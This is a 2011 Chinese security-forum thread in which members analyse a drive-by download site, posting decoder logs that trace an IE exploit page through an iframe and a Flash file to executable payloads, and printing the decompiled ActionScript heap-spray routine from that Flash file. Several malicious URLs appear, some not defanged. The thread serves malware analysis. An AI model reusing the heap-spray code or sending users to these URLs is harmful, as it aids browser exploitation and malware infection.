挂马网站 [已检测 by ˇじ☆ve塗]

显示全部楼层 · 发表于 2011-5-6 13:39:50

本帖最后由 ˇじ☆ve塗于 2011-5-30 01:09 编辑

            hxxp://www.80tq.cn/80/attachment/201103/i.html
         hXXp://www.200wwj.cn/mhxy/flash.htm

Log generated by ˇじ☆ve塗 use mdecoder 0.67
[root] http://www.80tq.cn/80/attachment/201103/i.html(Exploit.Ie0dayCVE0806.a)
[script]http://js.users.51.la/4696554.js
[iframe]http://www.200wwj.cn/mhxy/flash.htm
      [flash]http://www.200wwj.cn/mhxy/nb.swf
[virus]http://www.3qjc.com/bbs/forumdata/201.exe

http://www.200wwj.cn/mhxy/flash.htm 日志

显示全部楼层 · 发表于 2011-5-6 13:57:35

本帖最后由是昔流芳于 2011-5-6 19:01 编辑

地址如下
Log generated by cninguy use mdecoder 0.67
[root] hXXp://www.80tq.cn/80/attachment/201103/i.html(Exploit.Ie0dayCVE0806.a)
[script]http://js.users.51.la/4696554.js
[iframe]http://www.200wwj.cn/mhxy/flash.htm
[flash]http://www.200wwj.cn/mhxy/nb.swf
[virus]http://www.3qjc.com/bbs/forumdata/201.exe

显示全部楼层 · 发表于 2011-5-6 14:00:37

cninguy 发表于 2011-5-6 13:57
地址如下
Log generated by cninguy use mdecoder 0.67
[root] http://www.80tq.cn/80/attachment/201103 ...

[iframe]http://www.200wwj.cn/mhxy/flash.htm
也有问题

显示全部楼层 · 发表于 2011-5-6 14:42:12

关于:hxxp://www.80tq.cn/80/attachment/201103/i.html解密的日志(全体输出 -  5):

Level  0>hxxp://www.80tq.cn/80/attachment/201103/i.html
Level  1>hxxp://www.200wwj.cn/mhxy/flash.htm
Level  2>hxxp://www.200wwj.cn/mhxy/nb.swf ●
Level  2>hxxp://www.200wwj.cn/mhxy/mhxy.exe ●
Level  1>hxxp://www.3qjc.com/bbs/forumdata/201.exe ●

日志由 Redoce2.1第20次修正版于 2011/5/6 14:40:15 生成。

显示全部楼层 · 发表于 2011-5-6 17:48:15

以后注意禁用URL识别,别人误点就不好了.

显示全部楼层 · 发表于 2011-5-6 18:10:01

回复 5楼是昔流芳的帖子

好的，了解

显示全部楼层 · 发表于 2011-5-6 18:40:25

回复 5楼是昔流芳的帖子

试试我那个吧，怎么把tt改为xx还是木有用呢

显示全部楼层 · 发表于 2011-5-6 18:45:24

NORTON阻止了

显示全部楼层 · 发表于 2011-5-6 18:48:05

cninguy 发表于 2011-5-6 18:40
回复 5楼是昔流芳的帖子

试试我那个吧，怎么把tt改为xx还是木有用呢

在网址的最后的地方按删除就可以了

显示全部楼层 · 发表于 2011-5-6 18:59:22

本帖最后由是昔流芳于 2011-5-6 19:00 编辑

回复 7楼 cninguy 的帖子

除了always,你们两位未把http://www.200wwj.cn/mhxy/mhxy.exe解出.http://www.200wwj.cn/mhxy/flash.htm中的内容可能看不出什么,但请不要忽略nb.swf的内容.提取里面动作对象的代码.

package sdfasdf_fla
{
import flash.display.*;
import flash.events.*;
import flash.net.*;
import flash.utils.*;

dynamic public class MainTimeline extends MovieClip
{
      public var a:String;
      public var i:Object;
      public var b:String;
      public var loader:Loader;
      public var t:String;
      public var len:Object;
      public var ul:URLLoader;
      public var array:Array;

      public function MainTimeline()
      {
         addFrameScript(0, this.frame1);
         return;
      }// end function

      function frame1()
      {
         this.a = unescape("%u0d0d%u0d0d");
         this.t = this.a;
         this.b = unescape(stage.loaderInfo.parameters.sc);
         this.len = 1048576 - this.b.length - 256;
         while (this.a.length < this.len)
         {

            this.a = this.a + this.t;
         }
         this.a = this.a + this.b;
         this.array = new Array();
         this.i = 0;
         while (this.i < 200)
         {

            this.array[this.i] = new ByteArray();
            this.array[this.i].writeMultiByte(this.a, "unicode");
            var _loc_1:String = this;
            var _loc_2:* = this.i + 1;
            _loc_1.i = _loc_2;
         }
         this.ul = new URLLoader();
         this.ul.dataFormat = URLLoaderDataFormat.BINARY;
         this.ul.addEventListener(Event.COMPLETE, this.onComplete);
         this.ul.load(new URLRequest("encoded.swf"));
         this.loader = new Loader();
         addChild(this.loader);
         trace("xxxxxxxxxxxxxxxxx");
         return;
      }// end function

      public function onComplete(event:Event) : void
      {
         var _loc_2:* = (event.target as URLLoader).data;
         _loc_2.uncompress();
         this.loader.loadBytes(_loc_2);
         return;
      }// end function

}
}

根据这段代码可对http://www.200wwj.cn/mhxy/flash.htm进行解密,得到http://www.200wwj.cn/mhxy/mhxy.exe.

[其它] 挂马网站 [已检测 by ˇじ☆ve塗]